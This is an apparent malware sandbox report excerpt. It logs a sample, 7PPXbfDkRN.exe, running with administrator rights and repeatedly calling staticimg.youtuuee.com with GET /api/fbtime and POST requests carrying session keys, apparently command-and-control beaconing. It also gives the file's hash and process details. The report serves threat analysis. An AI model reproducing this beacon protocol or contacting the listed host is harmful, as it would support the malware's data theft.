59 192.168.2.5 49825 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
6 192.168.2.5 49754 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:18.505224943 CEST
1332 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:18.648884058 CEST
1332 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 34 39 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 34 61 5a 56 68 63 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149491,"time":1635061578,"rand_str":"4aZVhc"}0
Oct 24, 2021 09:46:18.781927109 CEST
1332 OUT POST /api/?sid=2149491&key=a900675f9a8d56a24a79c8f6976efc9f HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:18.936049938 CEST
1333 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
60 192.168.2.5 49829 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
61 192.168.2.5 49832 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
62 192.168.2.5 49836 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
63 192.168.2.5 49840 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
64 192.168.2.5 49844 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
65 192.168.2.5 49845 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
66 192.168.2.5 49846 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
67 192.168.2.5 49847 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
68 192.168.2.5 49848 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
69 192.168.2.5 49849 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
7 192.168.2.5 49755 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:20.000674009 CEST
1334 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:20.147985935 CEST
1334 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 35 34 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4b 41 6d 64 43 72 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149549,"time":1635061580,"rand_str":"KAmdCr"}0
Oct 24, 2021 09:46:20.284533978 CEST
1335 OUT POST /api/?sid=2149549&key=ef8fb823e4ca08a782cf605473692aff HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:20.434596062 CEST
1335 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
70 192.168.2.5 49850 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
71 192.168.2.5 49851 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
72 192.168.2.5 49852 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
73 192.168.2.5 49853 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
74 192.168.2.5 49856 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
75 192.168.2.5 49857 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
76 192.168.2.5 49858 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
77 192.168.2.5 49859 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
78 192.168.2.5 49860 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
79 192.168.2.5 49861 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
8 192.168.2.5 49756 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:21.431983948 CEST
1336 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:21.582541943 CEST
1337 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 36 31 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 31 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 35 6b 4b 6e 35 62 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149615,"time":1635061581,"rand_str":"5kKn5b"}0
Oct 24, 2021 09:46:21.678189993 CEST
1337 OUT POST /api/?sid=2149615&key=2891fe78238bcde026f8e178fbf9a3c7 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:21.834268093 CEST
1338 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
80 192.168.2.5 49862 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
81 192.168.2.5 49863 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
82 192.168.2.5 49869 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
83 192.168.2.5 49870 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
84 192.168.2.5 49871 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
85 192.168.2.5 49872 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
86 192.168.2.5 49873 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
87 192.168.2.5 49874 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
88 192.168.2.5 49875 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
89 192.168.2.5 49876 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
9 192.168.2.5 49757 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:22.728864908 CEST
1339 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:22.873564959 CEST
1339 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 36 37 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 54 50 79 44 6a 71 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149673,"time":1635061582,"rand_str":"TPyDjq"}0
Oct 24, 2021 09:46:22.986057997 CEST
1339 OUT POST /api/?sid=2149673&key=2f27b215dee998f785c084fa1eb07300 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:23.135428905 CEST
1340 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
90 192.168.2.5 49878 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
91 192.168.2.5 49879 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
92 192.168.2.5 49880 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
93 192.168.2.5 49881 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
94 192.168.2.5 49882 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
95 192.168.2.5 49883 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
96 192.168.2.5 49884 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
97 192.168.2.5 49885 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
98 192.168.2.5 49886 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
99 192.168.2.5 49887 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Joe Sandbox Cloud Basic 33.0.0 White Diamond
Code Manipulations
Statistics
System Behavior
Disassembly
Code Analysis
File Activities
Registry Activities
Start time: 09:46:10
Start date: 24/10/2021
Path: C:\Users\user\Desktop\7PPXbfDkRN.exe
Wow64 process (32bit): false
Commandline: 'C:\Users\user\Desktop\7PPXbfDkRN.exe'
Imagebase: 0x7ff6419c0000
File size: 1413632 bytes
MD5 hash: 1614D9ADFB1903A189E6EFD9B6DC4077
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Analysis Process: 7PPXbfDkRN.exe PID: 5172 Parent PID: 6124
General
File Read
Key Created
Key Value Created